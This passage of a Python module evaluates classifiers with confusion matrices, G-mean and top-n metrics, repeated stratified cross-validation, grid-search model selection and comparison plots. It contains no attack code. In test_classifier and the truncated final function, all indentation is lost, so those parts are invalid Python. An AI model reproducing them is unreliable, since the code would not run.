            columns=["attribute", "importance"])
        importance_df.to_csv(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "feature_importance", "csv")),
                             index=False)
        if plot:
            self._plot_interactive_feature_importance(column_names[indices], importances[indices], classifier_name)

    def save_confusion_matrix(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
        """
        Saves a confusion matrix (numpy array) to a file
        :param save_to_folder: folder to save the file to
        :type save_to_folder: string, optional (default=source file folder/ExperimentResults)
        :return:
        """
        np.savetxt(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "txt")),
                   metrics.confusion_matrix(self.y_true, self.y_pred).astype("int"), fmt="%d")
        # companion file listing the class label for each row/column
        with open(os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "txt")) +
                  "_classes.txt", 'w') as file_obj:
            for c in self.preprocessing.classes:
                file_obj.write(c + '\n')

    def plot_confusion_matrix(self, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
        """
        Plots a confusion matrix based on the evalution results.
        :param save_to_folder: determines the folder where the plot should be saved
        :return: plt, file_name
        """
        confusion_matrix = metrics.confusion_matrix(self.y_true, self.y_pred)
        # row-normalize so each row shows the distribution over predicted labels
        cm_normalized = confusion_matrix.astype('float') / confusion_matrix.sum(axis=1)[:, np.newaxis]
        plt.imshow(cm_normalized, interpolation='nearest', cmap=plt.cm.Greys)
        plt.title("Confusion matrix")
        plt.colorbar()
        tick_marks = np.arange(len(self.preprocessing.classes))
        plt.xticks(tick_marks, self.preprocessing.classes, rotation=90)
        plt.yticks(tick_marks, self.preprocessing.classes)
        plt.tight_layout()
        plt.ylabel('True label')
        plt.xlabel('Predicted label')
        file_name = _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "png")
        if not os.path.exists(save_to_folder):
            os.mkdir(save_to_folder)
        plt.savefig(os.path.join(save_to_folder, file_name))
        plt.close()

    def plot_interactive_confusion_matrix(self, save_to_folder=os.path.join(os.path.dirname(__file__),
                                                                            "ExperimentResults")):
        """
        Plots an interactive confusion matrix based on the evalution results.
        :param save_to_folder: determines the folder where the plot should be saved
        :return: plt, file_name
        """
        # plotly is imported lazily so the module works without it installed
        import plotly.offline
        import plotly.graph_objs as go
        confusion_matrix = metrics.confusion_matrix(self.y_true, self.y_pred)
        cm_normalized = confusion_matrix.astype('float') / confusion_matrix.sum(axis=1)[:, np.newaxis]
        file_name = os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "confusion_matrix", "html"))
        title = "<b>Acc: {:.1f}%, T5: {:.1f}%, T10: {:.1f}%, T20: {:.1f}%, " \
                "MR: {:.1f}%, K: {:.1f}%, " \
                "G: {:.1f}%</b>"\
            .format(self.metrics.accuracy*100, self.metrics.top_5_accuracy*100,
                    self.metrics.top_10_accuracy*100, self.metrics.top_20_accuracy*100,
                    self.metrics.macro_recall*100, self.metrics.kappa*100, self.metrics.gmean*100)
        for resolution_metric in self.resolution_metrics:
            # NOTE(review): '{:s}' applied to resolution_range (a tuple) looks
            # like it would raise TypeError on CPython 3 — confirm intended types.
            title += "<br>{:s}:{:05d}:{:03d} Acc: {:04.1f}%, T5: {:04.1f}%, T10: {:04.1f}%, T20: {:04.1f}%, " \
                     "MR: {:04.1f}%, K: {:04.1f}%, G: {:04.1f}%"\
                .format(resolution_metric.resolution_range, resolution_metric.subset_size, resolution_metric.n_classes,
                        resolution_metric.accuracy*100, resolution_metric.top_5_accuracy*100,
                        resolution_metric.top_10_accuracy*100, resolution_metric.top_20_accuracy*100,
                        resolution_metric.macro_recall*100, resolution_metric.kappa*100, resolution_metric.gmean*100)
        data = [
            go.Heatmap(
                x=self.preprocessing.classes,
                # y axis reversed so the matrix reads top-down like the static plot
                y=self.preprocessing.classes[::-1],
                z=cm_normalized[::-1, :].round(3),
                colorscale=[[0.0, "rgb(255, 255, 255)"], [1.0, "rgb(0, 0,0)"]]
            )
        ]
        layout = go.Layout(
            titlefont={"size": 14},
            title=title,
            xaxis={"title": "Predicted label"},
            yaxis={"title": "True label"},
            width=1000,
            height=775,
            autosize=False,
            margin=go.Margin(
                t=155,
                l=200,
                r=200,
                autoexpand=False
            ),
        )
        plotly.offline.plot(dict(data=data, layout=layout), filename=file_name)

    def _plot_interactive_feature_importance(self, feature_names, feature_importances, classifier_name,
                                             save_to_folder=os.path.join(os.path.dirname(__file__),
                                                                         "ExperimentResults")):
        """
        Plots an interactive confusion matrix based on the evalution results.
        :param save_plot_to_file: determines whether the created plot should be save to a file
        :param save_to_folder: determines the folder where the plot should be saved
        :return: plt, file_name
        """
        import plotly.offline
        import plotly.graph_objs as go
        file_name = os.path.join(save_to_folder, _get_file_name(self.dataset_name, self.classifier, "feature_importance", "html"))
        data = [
            go.Bar(
                x=feature_names,
                y=feature_importances
            )
        ]
        layout = go.Layout(
            title="Feature importance for " + classifier_name,
            xaxis={"title": ""},
            yaxis={"title": "Importance"},
            width=800,
            height=600,
            autosize=False
        )
        plotly.offline.plot(dict(data=data, layout=layout), filename=file_name)
class RepeatedStratifiedKFold(skms._split._BaseKFold):
    """
    Repeated Stratified K-Folds cross validation iterator. Provides train/test indices to split data in train test
    sets. This cross-validation object is a variation of KFold that returns stratified folds and repeats the process a
    given number of times. The folds are made by preserving the percentage of samples for each class.
    """
    def _iter_test_indices(self, X=None, y=None, groups=None):
        # Splits are generated via _iter_test_masks instead.
        raise NotImplementedError

    def __init__(self, n_iter=5, n_splits=2, random_state=None):
        """
        :param n_iter: number of iterations (reshuffles)
        :type n_iter: int, default=5
        :param n_splits: number of folds. Must be at least 2.
        :type n_splits: int, default=2
        :param random_state: Pseudo-random number generator state used for random sampling. If None, use default numpy
        RNG for shuffling
        :type random_state: None, int or RandomState
        """
        # The base class records the total number of folds yielded overall.
        super(RepeatedStratifiedKFold, self).__init__(n_splits * n_iter, True, random_state)
        self.n_iter = n_iter
        self.skfs = []
        for i in range(n_iter):
            # BUGFIX: random_state=None is documented as valid, but
            # ``random_state + i`` raised TypeError for None. Offset the seed
            # only when an int was supplied so each repetition reshuffles
            # differently; with None each StratifiedKFold uses the global RNG.
            seed = random_state + i if random_state is not None else None
            self.skfs.append(skms.StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed))

    def _iter_test_masks(self, X, y=None, groups=None):
        # Yield the boolean test mask for every fold of every repetition.
        for i, skf in enumerate(self.skfs):
            test_folds = skf._make_test_folds(X, y)
            for j in range(skf.n_splits):
                yield test_folds == j

    def __repr__(self):
        # Integer division keeps the reported per-repetition fold count an
        # int on Python 3 (self.n_splits holds the overall total).
        return '%s.%s(n_iter=%i, n_splits=%i, shuffle=%s, random_state=%s)' % (
            self.__class__.__module__,
            self.__class__.__name__,
            self.n_iter,
            self.n_splits // self.n_iter,
            self.shuffle,
            self.random_state,
        )

    def __len__(self):
        return self.n_splits
def g_mean(y_true, y_pred, labels=None, correction=0.001):
    """
    Computes the geometric mean of class-wise recalls.
    :param y_true: True class labels.
    :type y_true: list
    :param y_pred: Predicted class labels.
    :type y_pred: array-like
    :param labels: Labels present in the data can be excluded, for example to calculate a multiclass average ignoring a
    majority negative class, while labels not present in the data will result in 0 components in a macro average.
    :type labels: list, optional
    :param correction: substitution/correction for zero values in class-wise recalls
    :type correction: float
    :return: G-mean value
    """
    # Recall computation below mirrors sklearn's
    # precision_recall_fscore_support internals (bincount over encoded labels).
    present_labels = unique_labels(y_true, y_pred)
    if labels is None:
        labels = present_labels
        n_labels = None
    else:
        n_labels = len(labels)
        # requested labels first, then any remaining labels seen in the data
        labels = np.hstack([labels, np.setdiff1d(present_labels, labels, assume_unique=True)])
    le = LabelEncoder()
    le.fit(labels)
    y_true = le.transform(y_true)
    y_pred = le.transform(y_pred)
    sorted_labels = le.classes_
    # labels are now from 0 to len(labels) - 1 -> use bincount
    tp = y_true == y_pred
    tp_bins = y_true[tp]
    if len(tp_bins):
        tp_sum = bincount(tp_bins, weights=None, minlength=len(labels))
    else:
        # Pathological case
        true_sum = tp_sum = np.zeros(len(labels))
    if len(y_true):
        true_sum = bincount(y_true, weights=None, minlength=len(labels))
    # Retain only selected labels
    indices = np.searchsorted(sorted_labels, labels[:n_labels])
    tp_sum = tp_sum[indices]
    true_sum = true_sum[indices]
    # recall = TP / (TP + FN), with sklearn's safe division helper
    recall = _prf_divide(tp_sum, true_sum, "recall", "true", None, "recall")
    # zero recalls would force the geometric mean to 0; substitute a floor
    recall[recall == 0] = correction
    return sp.stats.mstats.gmean(recall)
def brier_score_loss_for_true_class(y_true, y_proba):
    """
    Calculates the Brier score from a set of class probabilities, using the
    probability assigned to each example's true class.
    :param y_true: True class labels (integer-encoded).
    :type y_true: list
    :param y_proba: Predicted class probabilities, shape (n_examples, n_classes).
    :type y_proba: array-like
    :return: Brier score, or -1 if probabilities are unavailable or scoring fails
    """
    if y_proba is None:
        return -1
    try:
        # Pick, per row, the probability of the true class.
        return metrics.brier_score_loss(y_true, y_proba[np.arange(len(y_proba)), y_true])
    except Exception:
        # Narrowed from a bare ``except:`` which would also swallow
        # KeyboardInterrupt/SystemExit; -1 keeps the best-effort contract.
        return -1
def top_n_accuracy(y_true, y_proba, top_n=10):
    """
    Computes the fraction of examples whose true class is among the ``top_n``
    most probable predicted classes.
    :param y_true: True class labels (integer-encoded numpy array).
    :param y_proba: Predicted class probabilities, shape (n_examples, n_classes).
    :param top_n: number of highest-probability classes that count as a hit
    :return: top-n accuracy in [0, 1], or -1 if probabilities are unavailable
    """
    if y_proba is None:
        return -1
    try:
        # Column indices of the top_n highest-probability classes per example.
        top_n_pred = np.argsort(y_proba, axis=1)[:, -top_n:]
        # Hit when any of those indices equals the true label of the row.
        return np.average(
            np.apply_along_axis(np.any, 1, np.equal(top_n_pred, np.repeat(y_true[:, np.newaxis], top_n, 1))))
    except Exception:
        # Narrowed from a bare ``except:`` which would also swallow
        # KeyboardInterrupt/SystemExit.
        return -1
def worst_prediction_rank(y_true, y_proba):
    """
    Computes the worst rank (1 = least probable, n_classes = most probable)
    that any example's true class received in the probability ordering.
    :param y_true: True class labels (integer-encoded numpy array).
    :param y_proba: Predicted class probabilities, shape (n_examples, n_classes).
    :return: worst rank over all examples, or -1 if probabilities are unavailable
    """
    if y_proba is None:
        return -1
    try:
        classes = y_proba.shape[1]
        # Ascending order: position 0 is the least probable class.
        sorted_pred = np.argsort(y_proba, axis=1)
        # np.where yields the position of the true class within each row's
        # ordering; the smallest position is the worst-ranked truth.
        worst_rank = classes - np.min(
            np.apply_along_axis(np.where, 1, np.equal(sorted_pred, np.repeat(y_true[:, np.newaxis], classes, 1))))
        return worst_rank
    except Exception:
        # Narrowed from a bare ``except:`` which would also swallow
        # KeyboardInterrupt/SystemExit.
        return -1
def mmap(var, filename):
    """Dump *var* next to this module and reload it as a writable memory map.

    Any stale ``<filename>.mmap`` file is removed first.  Returns a tuple of
    the memory-mapped object and the path of the backing file (the caller is
    responsible for deleting it when done).
    """
    # A tempfile directory was used previously; the module directory is kept
    # to preserve the current on-disk layout.
    target_dir = os.path.abspath(os.path.dirname(__file__))
    mmap_path = os.path.join(target_dir, '%s.mmap' % filename)
    if os.path.exists(mmap_path):
        os.unlink(mmap_path)
    joblib.dump(var, mmap_path)
    return joblib.load(mmap_path, mmap_mode='r+'), mmap_path
def train_classifier(classifier, X_train, y_train):
    """Fit *classifier* on the training data and return the fitted model.

    :param classifier: estimator exposing a ``fit(X, y)`` method
    :param X_train: training attribute values
    :param y_train: training classes
    :return: the same classifier object, trained in place
    """
    # Collect garbage before and after fitting to keep peak memory down on
    # large datasets.
    gc.collect()
    logging.info("Training...")
    classifier.fit(X_train, y_train)
    gc.collect()
    return classifier
def test_classifier(classifier, X_test, y_test, n_jobs=None):
"""
Tests a classifier on the given. If possible, this method also gets the probability of each class prediction.
:param classifier: classifier
:param X_test: testing attribute values
:param y_test: testing classes
:param n_jobs: overwriting number of threads used during prediction
:return: y_true, y_pred, y_prob
"""
gc.collect()
logging.info("Testing...")
if n_jobs is not None:
for param in classifier.get_params().keys():
if "n_jobs" in param or "nthread" in param:
classifier.set_params(**{param: n_jobs})
logging.debug("Update %s to %s" % (param, n_jobs))
# Experimental - to reduce memory consumption
# X_test, X_test_filename = mmap(X_test, 'X_test')
y_true = y_test
y_pred = classifier.predict(X_test)
y_prob = None
gc.collect()
try:
y_prob = classifier.predict_proba(X_test)
except:
logging.debug("Classifier does not produce probability scores")
gc.collect()
y_resolution = None
try:
y_resolution = X_test.resolution
except:
logging.debug("Did not find resolution column in test data")
return y_true, y_pred, y_prob, y_resolution
def select_model(classifier, param_grid, X_train, y_train, pipeline=None, seed=23, evaluation_metric="accuracy",
                 repeats=5, folds=2, jobs=-1):
    """
    Performs model selection.
    :param classifier: classifier
    :param param_grid: parameters values to choose from
    :param X_train: training attribute values
    :param y_train: training class values
    :param pipeline: preprocessing pipeline steps
    :param seed: random seed for repeated stratified cross-validation
    :param evaluation_metric: metric used to select best model
    :param repeats: number of repeatitions in repeated stratified cross-validation
    :param folds: number of folds in each repetition in repeated stratified cross-validation
    :param jobs: number of jobs to run in parallel.
    :return: the fitted GridSearchCV object and the model selection time in seconds
    """
    cv_proc = RepeatedStratifiedKFold(n_iter=repeats, n_splits=folds, random_state=seed)
    steps = list()
    # Prefix classifier parameter names so they address the "clf" pipeline
    # step; NOTE this mutates param_grid[0] in place.
    for key in list(param_grid[0].keys()):
        param_grid[0]["clf__" + key] = param_grid[0].pop(key)
    if pipeline is not None:
        # Each pipeline entry maps a step name to {step_callable: param_grid}.
        for step_name, step_value in pipeline:
            for step_func, step_param_grid in iter(step_value.items()):
                steps.append((step_name, step_func))
                for key in list(step_param_grid[0].keys()):
                    param_grid[0][step_name + "__" + key] = step_param_grid[0][key]
    steps.append(("clf", classifier))
    pipe = Pipeline(steps)
    gc.collect()
    start = time.time()
    _print_evaluation_header(pipe)
    logging.info("Model selection...")
    grid = skms.GridSearchCV(pipe, param_grid, cv=cv_proc, verbose=3, pre_dispatch=jobs,
                             scoring=evaluation_metric, n_jobs=jobs, iid=False)
    gc.collect()
    grid.fit(X_train, y_train)
    search_time = time.time() - start
    gc.collect()
    return grid, search_time
def train_and_test(estimator, X, y, dataset_name, preprocessing, seed, test_split, write_to_csv=True,
                   save_confusion_matrix=False, learning_curve=False, confusion_matrix=True,
                   save_predictions=True, save_model=False, save_feature_importance=True):
    """
    Performs simple classifier training and testing using a holdout procedure.
    :param estimator: classifier
    :param X: attribute values
    :param y: class values
    :param dataset_name: dataset name to distinguish different test runs in result files
    :param preprocessing: Preprocessing() object
    :param seed: random seed for data set splitting
    :param test_split: percentage of the dataset that is held out for testing
    :param write_to_csv: should the evaluation results be saved to a csv file
    :param save_confusion_matrix: should the resulting confusion matrix be saved to a file
    :param learning_curve: determines whether a learning curve will be plotted and saved to a file
    :param confusion_matrix: determines whether the confusion matrix will be plotted and saved to a file
    :param save_predictions: saves prections (as well as probabilities and true classes) to a file
    :param save_model: saves trained classifier to a file
    :param save_feature_importance: saves feature importance to a csv and interactive html file (plot)
    :return: the Evaluation object summarizing the run
    """
    # Stratified holdout split so the class distribution is preserved.
    X_train, X_test, y_train, y_test = skms.train_test_split(X, y, test_size=test_split, random_state=seed, stratify=y)
    _print_evaluation_header(estimator)
    training_start = time.time()
    clf = train_classifier(estimator, X_train, y_train)
    training_time = time.time() - training_start
    testing_start = time.time()
    y_true, y_pred, y_prob, y_resolution = test_classifier(clf, X_test, y_test)
    testing_time = time.time() - testing_start
    logging.info("Evaluating")
    evaluation = Evaluation(dataset_name, preprocessing, clf, None, y_true, y_pred, y_prob, y_resolution, None, None,
                            training_time, testing_time)
    logging.info(evaluation)
    # Emit whichever optional artifacts (csv, plots, model dump...) were requested.
    _optional_output(clf, evaluation, X, y, write_to_csv, save_confusion_matrix, learning_curve,
                     confusion_matrix, save_predictions, save_model, save_feature_importance)
    return evaluation
def run_experiment(classifiers, X, y, dataset_name, preprocessing, pipeline, seed, evaluation_metric="accuracy",
                   outer_cv=10, repeats=5, folds=2, jobs=-1, write_to_csv=True,
                   save_confusion_matrix=False, learning_curve=False, confusion_matrix=False,
                   save_predictions=False, save_model=False, save_feature_importance=False):
    """
    Runs a series of experiments selecting model parameters and testing different classifiers.
    :param classifiers: mapping of classifier -> parameter grid
    :param X: attribute values
    :param y: class values
    :param dataset_name: dataset name to distinguish different test runs in result files
    :param preprocessing: dataset Preprocessing() object
    :param pipeline: preprocessing pipeline steps
    :param seed: random seed for repeated stratified cross-validation
    :param evaluation_metric: metric used to select best model
    :param outer_cv: number of folds of the outer evaluation cross-validation
    :param repeats: number of repeatitions in repeated stratified cross-validation (inner model selection)
    :param folds: number of folds in each repetition in repeated stratified cross-validation
    :param jobs: number of jobs to run in parallel.
    :param write_to_csv: should the evaluation results be saved to a csv file
    :param save_confusion_matrix: should the resulting confusion matrix be saved to a file
    :param learning_curve: determines whether a learning curve will be plotted and saved to a file
    :param confusion_matrix: determines whether the confusion matrix will be plotted and saved to a file
    :return: None; per-fold results are logged and optionally written to files
    """
    # Deep copy so parameter-grid rewriting inside select_model() does not
    # leak into the caller's dictionaries.
    classifiers = copy.deepcopy(classifiers)
    for classifier, param_grid in iter(classifiers.items()):
        cv = skms.StratifiedKFold(n_splits=outer_cv, random_state=seed, shuffle=False)
        for fold_num, (train, test) in enumerate(cv.split(X, y)):
            # Fresh copies per fold: select_model() mutates the grid in place.
            clf = copy.deepcopy(classifier)
            params = copy.deepcopy(param_grid)
            pipe = copy.deepcopy(pipeline)
            logging.info("================================================================================")
            logging.info("Fold %d:", fold_num)
            logging.info("")
            X_train, X_test = X.iloc[train,], X.iloc[test,]
            y_train, y_test = y.iloc[train], y.iloc[test]
            gc.collect()
            search_results, search_time = select_model(clf, params, X_train, y_train, pipe, seed,
                                                       evaluation_metric, repeats, folds, jobs)
            gc.collect()
            testing_start = time.time()
            y_true, y_pred, y_prob, y_resolution = test_classifier(search_results, X_test, y_test)
            testing_time = time.time() - testing_start
            evaluation = Evaluation(dataset_name, preprocessing, search_results.best_estimator_, params, y_true, y_pred,
                                    y_prob, y_resolution, search_results, evaluation_metric, search_time, testing_time)
            logging.info(evaluation)
            _optional_output(search_results.best_estimator_, evaluation, X, y, write_to_csv, save_confusion_matrix,
                             learning_curve, confusion_matrix, save_predictions, save_model, save_feature_importance,
                             fold_num)
            gc.collect()
def cross_validate(classifiers, X, y, dataset_name, preprocessing, seed, cv_folds=10, write_to_csv=True,
                   save_confusion_matrix=True, learning_curve=False, confusion_matrix=False,
                   save_predictions=True, save_model=False, save_feature_importance=True):
    """
    Cross-validates each classifier (no hyper-parameter search) and logs/saves per-fold evaluations.
    :param classifiers: iterable of classifiers to evaluate
    :param X: attribute values
    :param y: class values
    :param dataset_name: dataset name to distinguish different test runs in result files
    :param preprocessing: dataset Preprocessing() object
    :param seed: random seed for the stratified cross-validation split
    :param cv_folds: number of cross-validation folds
    :param write_to_csv: should the evaluation results be saved to a csv file
    :param save_confusion_matrix: should the resulting confusion matrix be saved to a file
    :param learning_curve: determines whether a learning curve will be plotted and saved to a file
    :param confusion_matrix: determines whether the confusion matrix will be plotted and saved to a file
    :param save_predictions: saves predictions (as well as probabilities and true classes) to a file
    :param save_model: saves trained classifier to a file
    :param save_feature_importance: saves feature importance to a file
    :return: None; per-fold results are logged and optionally written to files
    """
    # Deep copy so per-fold fitting never mutates the caller's estimators.
    classifiers = copy.deepcopy(classifiers)
    for classifier in classifiers:
        cv = skms.StratifiedKFold(n_splits=cv_folds, random_state=seed, shuffle=False)
        for fold_num, (train, test) in enumerate(cv.split(X, y)):
            # Fresh classifier per fold so folds stay independent.
            clf = copy.deepcopy(classifier)
            logging.info("================================================================================")
            logging.info("Fold %d:", fold_num)
            logging.info("")
            X_train, X_test = X.iloc[train,], X.iloc[test,]
            y_train, y_test = y.iloc[train], y.iloc[test]
            gc.collect()
            training_start = time.time()
            _print_evaluation_header(clf)
            clf = train_classifier(clf, X_train, y_train)
            training_time = time.time() - training_start
            gc.collect()
            testing_start = time.time()
            y_true, y_pred, y_prob, y_resolution = test_classifier(clf, X_test, y_test)
            testing_time = time.time() - testing_start
            logging.info("Evaluating")
            evaluation = Evaluation(dataset_name, preprocessing, clf, None, y_true, y_pred, y_prob, y_resolution, None,
                                    None, training_time, testing_time)
            logging.info(evaluation)
            _optional_output(clf, evaluation, X, y, write_to_csv, save_confusion_matrix, learning_curve,
                             confusion_matrix, save_predictions, save_model, save_feature_importance, fold_num)
            gc.collect()
def compare_datasets(classifiers, data_folder, dataset_names, class_attr, selected_attr, max_num_of_classes,
                     min_examples_per_class, pipeline, seed, repeats=5, folds=2, write_to_csv=True,
                     create_box_plot=True, validation_data=None, twilight_data=None,
                     save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
    """
    Evaluates the given classifiers on several datasets restricted to their common
    examples, appends every per-fold evaluation to one timestamped comparison csv
    and optionally box-plots the results.
    :param classifiers: mapping of classifier -> parameter grid (grids are not tuned here)
    :param data_folder: folder containing the dataset csv files
    :param dataset_names: file names of the datasets to compare
    :param class_attr: name of the class attribute
    :param selected_attr: attributes to keep for classification
    :param max_num_of_classes: maximum number of classes retained by the cleaner
    :param min_examples_per_class: minimum examples per retained class
    :param pipeline: preprocessing pipeline steps (same structure as in select_model)
    :param seed: random seed for cleaning and cross-validation
    :param repeats: number of repetitions in repeated stratified cross-validation
    :param folds: number of folds per repetition
    :param write_to_csv: append each fold's evaluation to the comparison csv
    :param create_box_plot: plot the comparison csv when done
    :param validation_data: forwarded to the DatasetCleaner
    :param twilight_data: forwarded to the DatasetCleaner
    :param save_to_folder: output folder for the csv and the plot
    """
    comparison_file = "Comparison" + time.strftime("%Y%m%d_%H%M%S", time.localtime()) + ".csv"
    logging.info("Finding common examples...")
    # Restrict every dataset to the examples (titles) present in all of them,
    # so scores are comparable across datasets.
    common_blobs = _get_common_blobs([os.path.join(data_folder, fix) for fix in dataset_names])
    for dataset_name in dataset_names:
        dataset_path = os.path.join(data_folder, dataset_name)
        clean_data = prep.DatasetCleaner(prep.read_dataset(dataset_path), class_attribute=class_attr,
                                         select_attributes=selected_attr, max_num_of_classes=max_num_of_classes,
                                         min_examples_per_class=min_examples_per_class, seed=seed,
                                         where_title=common_blobs, sort_by_title=True, filter_examples=True,
                                         validation_data=validation_data, twilight_data=twilight_data)
        X, y = clean_data.prepare_for_classification(class_attr, [class_attr])
        for classifier, param_grid in iter(classifiers.items()):
            steps = list()
            if pipeline is not None:
                # Only the pipeline step callables are used; their parameter
                # grids are ignored because no search is performed here.
                for step_name, step_value in pipeline:
                    for step_func, step_param_grid in iter(step_value.items()):
                        steps.append((step_name, step_func))
            steps.append(("clf", classifier))
            pipe = Pipeline(steps)
            _print_evaluation_header(pipe)
            cv_proc = RepeatedStratifiedKFold(n_iter=repeats, n_splits=folds, random_state=seed)
            fold_num = 0
            for train, test in cv_proc.split(X, y):
                logging.info("Fold: " + str(fold_num))
                fold_num += 1
                training_start = time.time()
                clf = train_classifier(pipe, X.iloc[train, :], y[train])
                training_time = time.time() - training_start
                testing_start = time.time()
                y_true, y_pred, y_prob, y_resolution = test_classifier(clf, X.iloc[test, :], y[test])
                testing_time = time.time() - testing_start
                evaluation = Evaluation(dataset_name, clean_data, clf, None, y_true, y_pred, y_prob, y_resolution,
                                        None, None, training_time, testing_time)
                if write_to_csv:
                    evaluation.write_to_csv(file_name=comparison_file, save_to_folder=save_to_folder)
    if create_box_plot:
        logging.info("Plotting comparison results...")
        df = pd.read_csv(os.path.join(save_to_folder, comparison_file))
        # Strip the ".csv" extension from dataset names for nicer axis labels.
        df.loc[:, "Dataset"] = df.loc[:, "Dataset"].str.slice(0, -4)
        # Shorten classifier names for the plot legend.
        df.loc[df["Classifier"] == "KNeighborsClassifier", "Classifier"] = "k-NN"
        df.loc[df["Classifier"] == "RandomForestClassifier", "Classifier"] = "RF"
        df.loc[df["Classifier"] == "LogisticRegression", "Classifier"] = "Logit"
        df.loc[df["Classifier"] == "SVC", "Classifier"] = "SVM"
        df.loc[df["Classifier"] == "LGBMClassifier", "Classifier"] = "LightGBM"
        plot_comparison(df, file_name=comparison_file + ".png", save_to_folder=save_to_folder)
def lgbm_cv_early_stopping(lgbm, X, y, pipeline, seed, outer_cv=10, repeats=2, folds=5, early_stopping_rounds=10):
    """
    Estimates, per outer fold, the mean best number of LightGBM boosting
    iterations using inner repeated stratified cross-validation with early
    stopping. Results are only logged, nothing is returned.
    :param lgbm: LightGBM classifier supporting ``early_stopping_rounds`` in ``fit``
    :param X: attribute values (DataFrame)
    :param y: class values (Series)
    :param pipeline: preprocessing pipeline steps (same structure as in select_model)
    :param seed: random seed for both cross-validation procedures
    :param outer_cv: number of outer folds
    :param repeats: repetitions of the inner cross-validation
    :param folds: folds per inner repetition
    :param early_stopping_rounds: rounds without improvement before stopping
    """
    cv = skms.StratifiedKFold(n_splits=outer_cv, random_state=seed, shuffle=False)
    for fold_num, (train, test) in enumerate(cv.split(X, y)):
        X_train, X_test = X.iloc[train,], X.iloc[test,]
        y_train, y_test = y.iloc[train], y.iloc[test]
        rskf = RepeatedStratifiedKFold(random_state=seed, n_iter=repeats, n_splits=folds)
        best_iterations = []
        if pipeline is not None:
            # Only the preprocessing steps are assembled here; their parameter
            # grids are ignored (no search is performed).
            steps = []
            for step_name, step_value in pipeline:
                for step_func, step_param_grid in iter(step_value.items()):
                    steps.append((step_name, step_func))
            pipe = Pipeline(steps)
        else:
            pipe = lgbm
        for train, test in rskf.split(X_train, y_train):
            # Copies keep the inner-fold transforms from touching outer data.
            X_train_fold = X_train.iloc[train, :].copy()
            y_train_fold = y_train.iloc[train].copy()
            X_test_fold = X_train.iloc[test, :].copy()
            y_test_fold = y_train.iloc[test].copy()
            if pipeline is not None:
                # Fit a fresh clone of the preprocessing per inner fold.
                pipe_fold = clone(pipe)
                X_train_fold = pipe_fold.fit_transform(X_train_fold, y_train_fold)
                X_test_fold = pipe_fold.transform(X_test_fold)
            fit = lgbm.fit(X_train_fold, y_train_fold, early_stopping_rounds=early_stopping_rounds,
                           eval_set=[(X_test_fold, y_test_fold)], eval_metric="multi_logloss", verbose=False)
            best_iter = int(fit.best_iteration)
            best_iterations.append(best_iter)
            logging.info("Best iteration: {0} ".format(str(best_iter)))
        mean_best_iter = int(np.mean(best_iterations))
        logging.info("Fold %d: Rounded mean best number of boosting iterations: %s", fold_num, str(mean_best_iter))
def plot_comparison(df, file_name, save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
    """
    Creates a grid of box plots (classifiers x metrics, datasets on the x-axis)
    from a comparison result frame and saves it to *file_name*.
    :param df: comparison results with Classifier/Dataset and metric columns
    :param file_name: name of the output image file
    :param save_to_folder: folder the image is written to (created if missing)
    """
    sns.set_style("whitegrid")
    # Melt the wide metric columns into (Metric, Score) pairs for faceting.
    df = util.pandas_gather(df, "Metric", "Score", ["Accuracy", "Macro recall", "Kappa", "G-mean"])
    g = sns.FacetGrid(df, row="Classifier", col="Metric", sharey=False, margin_titles=True)
    g = (g.map(sns.boxplot, "Dataset", "Score"))
    g.set_xticklabels(rotation="vertical")
    if not os.path.exists(save_to_folder):
        os.mkdir(save_to_folder)
    # The `sns.plt` alias was removed in seaborn 0.8; use matplotlib's pyplot
    # directly (already imported at module level, see plot_learning_curve).
    plt.savefig(os.path.join(save_to_folder, file_name))
    plt.close()
def plot_learning_curve(classifier, X, y, measurements=[0.1, 0.325, 0.55, 0.775, 1.], metric=None, n_jobs=-1,
                        save_to_folder=os.path.join(os.path.dirname(__file__), "ExperimentResults")):
    """
    Calculates the learning curve for a given model (classifier or regressor). The methods takes the evaluation
    metric as a parameter. Additionally the method saves a plot of the calculated learning curve to a file.
    :param classifier: learning model
    :type classifier: sklearn estimator
    :param X: training data
    :type X: DataFrame
    :param y: training labels
    :type y: Series
    :param measurements: fractions of the training set at which classifier/regressor performance is measured
        (the points defining the learning curve); mutable default is safe here as it is never modified
    :type measurements: list of float
    :param metric: evaluation metric
    :type metric: sklearn scorer
    :param n_jobs: number of threads
    :type n_jobs: int
    :param save_to_folder: determines the folder where the learning curve plot should be saved
    :type save_to_folder: str
    :return: None; the plot is written to ``save_to_folder``
    """
    sns.set_style("whitegrid")
    plt.figure()
    plt.title("Learning curves")
    plt.xlabel("Training examples")
    plt.ylabel("Score")
    train_sizes, train_scores, test_scores = skms.learning_curve(classifier, X, y, n_jobs=n_jobs,
                                                                 train_sizes=measurements, scoring=metric)
    # Mean +/- std over CV folds, drawn as shaded bands around the curves.
    train_scores_mean = np.mean(train_scores, axis=1)
    train_scores_std = np.std(train_scores, axis=1)
    test_scores_mean = np.mean(test_scores, axis=1)
    test_scores_std = np.std(test_scores, axis=1)
    plt.grid()
    plt.fill_between(train_sizes, train_scores_mean - train_scores_std,
                     train_scores_mean + train_scores_std, alpha=0.1,
                     color="r")
    plt.fill_between(train_sizes, test_scores_mean - test_scores_std,
                     test_scores_mean + test_scores_std, alpha=0.1, color="g")
    plt.plot(train_sizes, train_scores_mean, 'o-', color="r",
             label="Training score")
    plt.plot(train_sizes, test_scores_mean, 'o-', color="g",
             label="Cross-validation score")
    plt.legend(loc="best")
    file_name = _get_file_name("", classifier, "learning_curve", "png")
    if not os.path.exists(save_to_folder):
        os.mkdir(save_to_folder)
    plt.savefig(os.path.join(save_to_folder, file_name))
    plt.close()
def _get_common_blobs(dataset_paths, key="title", sep=";", header=0, na_values=["n/a", "nan"], low_memory=False):
merged = pd.read_csv(dataset_paths[0], sep=sep, header=header, na_values=na_values, low_memory=low_memory)
merged = merged.loc[merged["part_00_electrons"] > 0, :]
for i in range(len(dataset_paths) - 1):
